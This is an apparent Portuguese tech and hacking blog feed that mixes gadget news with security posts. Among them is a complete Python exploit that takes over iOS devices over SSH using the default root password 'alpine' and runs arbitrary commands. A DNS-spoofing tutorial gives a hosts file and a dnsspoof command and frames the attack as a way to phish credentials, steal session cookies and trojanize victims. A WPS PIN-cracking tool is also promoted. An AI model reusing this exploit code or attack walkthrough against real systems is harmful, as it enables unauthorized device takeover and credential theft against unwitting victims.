Window Washing Robot, o Robô que Lava Janelas

 

Window-Washing-Robot

Quando o mundo estiver dominado pelos robôs, no futuro distante, os poucos sobreviventes não vão lembrar que o apocalipse começou com máquinas simples como este novo e utilíssimo robô inteligente que lava janelas!

Window Washing Robot é o primeiro robô do mundo capaz de limpar automaticamente vidros de qualquer espessura usando uma poderosa bomba de vácuo para prendê-lo no vidro e dois motores que movimentam as esteiras antiderrapantes. O robô calcula automaticamente o tamanho do vidro e a rota mais eficiente para limpá-lo (por isso é “inteligente”). Perfeito para quem mora em andares altos!

O Window Washing Robot custa US$399,99 na pré-venda da Sharper Image

Fonte:DigitalDrops

Exploit: IOS Remote Command Execution via ssh

Os dispositivos iOS permitem executar código remoto mediante ssh, D35m0nd142 fez um exploit demostrando esta ação.

 

Compartilho o link do 1137day e o código.

http://1337day.com/exploits/14805

#!/usr/bin/python
# When you've launched the command look the terminal
# This software work without Metasploit 
# Exploit Title: [GUI]Apple iPhone iOS Default SSH Remote Command Execution exploit
# Exploit Author: D35m0nd142
# Vendor Homepage: http://www.apple.com
# Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premium

import paramiko 
import Tkinter 
from tkMessageBox import *
import sys
import os
print "******************************************************************"
print "*Apple iPhone iOS Default SSH Remote Command Execution exploit   *"
print "*                 Created by D35m0nd142                          *"
print "******************************************************************\n" 

root=Tkinter.Tk()
root.geometry("%dx%d" % (490,220))
def exploit():
 ssh = paramiko.SSHClient()
 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 ip_iphone=ip.get()
 ssh.connect(ip_iphone,username='root',password='alpine')
 cmd=command.get()
 stdin, stdout, stderr = ssh.exec_command(cmd)
 print stdout.readlines()
 ok=Tkinter.Label(text="Command executed",bg="blue",fg="yellow").pack() 
 ssh.close()

root['bg']="black"
root.title("Apple iOS Default SSH Remote Command Execution exploit")
message=showwarning("Warning","D35m0nd142 isn't responsable for your use of this software")
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_label=Tkinter.Label(text="iPhone IP: ").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
command_label=Tkinter.Label(text="Command to execute: ").pack()
command=Tkinter.StringVar()
command_entry=Tkinter.Entry(textvariable=command).pack()
launch_exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
root.mainloop()

Hacking Exposed 7: Network Security Secrets & Solutions, Seventh Edition

HAcking Exposed já virou sinônimo de livros sobre segurança e qualidade. A editora responsável se preocupa em muito no mantenimento de suas edições sempre atualizadas e escritas por profissionais de peso, com bagagem técnica.

Este livro, o qual poderá ser consultado a partir do seguinte link, é recomendado para aqueles que desejam aprender um pouco mais sobre segurança da informação.

Fonte:CorujaTI

DNS Spoofing

Hoje queremos ensinar o método DNS Spoofing como uma vítima sendo enganado, a fim de conseguir encaminhá-lo para um endereço IP que nos interessa. Por que pode ser interessante? fácil:

  • Conseguir lançar um exploit contra a vítima.
  • Mostrar um site falso e pegar suas credenciais.
  • Obter o cookie de sessão da vítima.
  • Ou … todos juntos … ou seja, vamos mostrar um site falso, pegamos a senha, e nós jogamos um exploit, o que obviamente é o navegador vulnerável e troyanizamos sua máquina sem que você perceba que você enviar para o site original, de modo que você não sabe que algo está errado … O que você acha? Agora que é pura … arte!

Scenario

  • Uma vítima com o Microsoft Windows XP SP3 e usa um servidor DNS externo na rede local, como o Google DNS 8.8.8.8.
  • Um invasor com Kali Linux.
  • Agressor e vítima estão na mesma LAN. O atacante irá interceptar solicitações e respostas DNS, fornecendo o endereço IP que ele quer através da construção de um arquivo hosts especial.

Realizada pela primeira vez ataque MITM à vítima através de ARP Spoofing. Uma vez que o tráfego flui através do atacante, construímos um arquivo hosts a serem passados ​​para dnsspoof. Este arquivo especifica os endereços IP acordes para os nomes de domínio que você deseja spoof. O trecho a seguir simula o arquivo de texto editado:

 

192.168.0.57 *.tuenti.com
192.168.0.57 tuenti.com

Depois de ter criado o arquivo que você deve executar a ferramenta com a seguinte sintaxe dnsspoof

dnsspoof –i eth0 –f <fichero de hosts>.

 

Desta maneira simples você pode fazer um phishing quase perfeito, considerando que o site é um clone do original. Por outro lado, a vítima pode detectar este caso para verificar o status do seu cache considera que a resolução de nomes de domínio para Tuenti ter ficado em um endereço IP local, que surpresa e tanto para o usuário final.

Finalmente, indicam que a técnica é bastante simples e interessante. Tenha cuidado com suas máquinas de LAN como realizar este tipo de ataque é muito simples. :D :D

WPSCRACKGUI – GRAPHICAL TOOL FOR CRACKING WPS WIRELESS PIN

changelog v1.2.1 :
* The Portuguese language was added.
* Was added the Kozumi Keygen.
* Was added the Edimax Keygen.
* Was added the Belkin Keygen.
* Was added the Nisuta Keygen.
* Update Database to: # 301 Pines, # 120 MAC Address.
* Fixed bugs in General.
Graphical interface to the network cracking WPS Reaver.
wps_crack_gui1features :
  • Graphic User Interface (GUI) WPS encryption cracking.
  • Advanced Attack with Generic Dictionary.
  • Advanced Dictionary Attack with Enhanced.
  • Updated Assisted Reaver-WPS.
  • Database with PINs.
  • Change MAC Address.
  • Supported in Gt and Gtk.
  • Scan networks.
Fonte:Kembolle

HACKING WEB APPS

Wowebook é foda. Ele sempre libera bons livros para galera que gosta de estudar da forma auto ditada. Essa semana o site liberou uma excelente coletânea focada em segurança. Mas agora falaremos de um livro focado em Web Apps

HACKING WEB APPS é um livro que precisa ser lido por todos aqueles que pensam em mexer com segurança focada para aplicações Web. Ele trás uma série de exemplos e explicações que serão a sua base de conhecimento.

Veja os temas abordados em seus capítulos:

  • SQL Injection
  • Cross Site Scripting
  • Logic Attacks
  • Server Misconfigurations
  • Predictable Pages
  • Web of Distrust
  • Breaking Authentication Schemes
  • HTML5 Security Breaches
  • Attacks on Mobile Apps
  • Even if you don’t develop web sites or write HTML

Vejam que praticamente cada capítulo é um tipo de ataque. O livro poderá ser consultado a partir do seguinte link.

Boa leitura.

Fonte:CorujadeTI

Luminária USB em Forma de Lâmpada Incandescente

 

Bright-Idea-USB-Lightbulb

Existem muitos notebooks sem iluminação no teclado e escrever no escuro com um computador desses vira uma tarefa complicada de adivinhação. Para isto existem muitas opções de luzes USB disponíveis no mercado de vários tipos diferentes, mas este modelo da Mustard tem um design incrível e bem familiar.

Bright Idea USB Lightbulb tem a forma de uma lâmpada incandescente que todos conhecemos, presa num braço articulado, e com uma iluminação azul suave, que não vai atrapalhar a visão da tela.

O Bright Idea USB Lightbulb custa £10 na pré-venda da Mustard.

Fonte:DigitalDrops

Fone de Ouvido Bluetooth com Touchpad

 

Finger-Swipe-Headphones

Os fones de ouvido Bluetooth têm um problema comum, a dificuldade em encontrar e acertar os botões desejados sem olhar, só com a mão. Os erros são comuns e em vez de diminuir, você aumenta o som ou desliga, quando quer pular a música.

Finger Swipe Headphones acaba com o problema da maneira mais óbvia possível, elimina os botões e usa toda a superfície do fone sensível ao toque. O fone esquerdo funciona como um touchpad para controlar a música arrastando o dedo na superfície: ao deslizar o dedo para cima e para baixo é possível aumentar ou diminuir o som e arrastando o dedo horizontalmente faz a música avançar ou retroceder. Excelente ideia!

Finger Swipe Headphones vem com microfone, desliga a música automaticamente ao receber uma ligação e é equipado com dois drivers 40mm com frequência de resposta de 20Hz a 2KHz. O fone é dobrável e tem 10 horas de autonomia com a carga completa.

O par de fones de ouvido Finger Swipe Headphones custa US$149,95 na Hammacher Schlemmer.

Fonte:DigitalDrops

Como verificar o IP do remetente de um e-mail

Nesse tutorial,vou  mostrar como detectar o endereço IP do remetente.

O e-mail endereço IP do remetente é depender de qual provedor de e-mail que você usa. Como sabemos, há muitos provedor de email que fornecem conta de e-mail gratuito, mas por agora só usamos Gmail, Yahoo e Windows Live Hotmail. Com a lógica como verificar o endereço IP do remetente de e-mail que eu espero que você também pode fazer o mesmo com outro provedor de e-mail.

 

Requirement:

1. Internet connection :-)

Step by Step how to Check Email Sender IP Address:

1. First step I will try to send an email from Yahoo account to Gmail account.

How to Check Email Sender IP Address

2. In Gmail you can view the email sender IP address by show the original email in the menu.

How to Check Email Sender IP Address

3. When you click the link it will show some text page that displaying the details of how the message sent from Yahoo until the email arrive in your inbox. Actually the logic is the same when you sending a packet through ups or fedex, you can track the path of your packet where they made a checkpoint(but not as detail as this two logistics service).

How to Check Email Sender IP Address

The text “Received: from” will show you the email sender IP address (see the red box).

From this three steps, we know that if the sender use Yahoo, we can know the sender original IP address.

4. Now the next I will try to send email fro Gmail to Yahoo. Here is the screenshot.

How to Check Email Sender IP Address

5.To check the email sender IP address, you can click the actions and choose view full header.

How to Check Email Sender IP Address

6. Gmail will use the X-Originating-IP to show the sender IP address, but for the privacy they mask and change the Original email sender IP address with Google ip address.

How to Check Email Sender IP Address

If you see the email sender IP address in the red box above, it was Google IP address.

7. Now the last one is testing using Windows Live Hotmail. I try to send it both to Gmail and yahoo. Here is the result in Gmail.

How to Check Email Sender IP Address

Last year Windows Live Hotmail still have the X-Originating-IP, but start in January 2013 they said that they started to protect their users by disable the X-Originating-IP and new variable show up there as X-EIP. This X-EIP is always change dynamically even you send the same email from the same ip address, so maybe it’s a little hard enough to break it :-)

8. Update (the real case)

When I just want to finish this tutorial, then suddenly one email come to my inbox, thanks to that guy helped me to finish this tutorial :-P

How to Check Email Sender IP Address

Rea is one of my friend in Indonesia, I believe she will not sending me this kind of link :-)

Since the sender was using yahoo account, so it is possible for us to detect the original IP address where they come from.

How to Check Email Sender IP Address

9. Now after knowing the email sender IP address 79.129.249.124, let’s find out more about this IP address by whois-ing here using my tools, or you can visit whatismyipaddress.com to check about that email sender IP address. Here is the result:

How to Check Email Sender IP Address

Conclusion:

1. From the three free email provider above, we know that the format of email header is depend on which provider we use to send that email.

2. If you send email from Gmail and Windows Live Hotmail they will hide the email sender IP address.

3. If you send email from Yahoo the recipient of your email can know your ip address.

hope it useful :-)

FONTE:Vishnuvalentino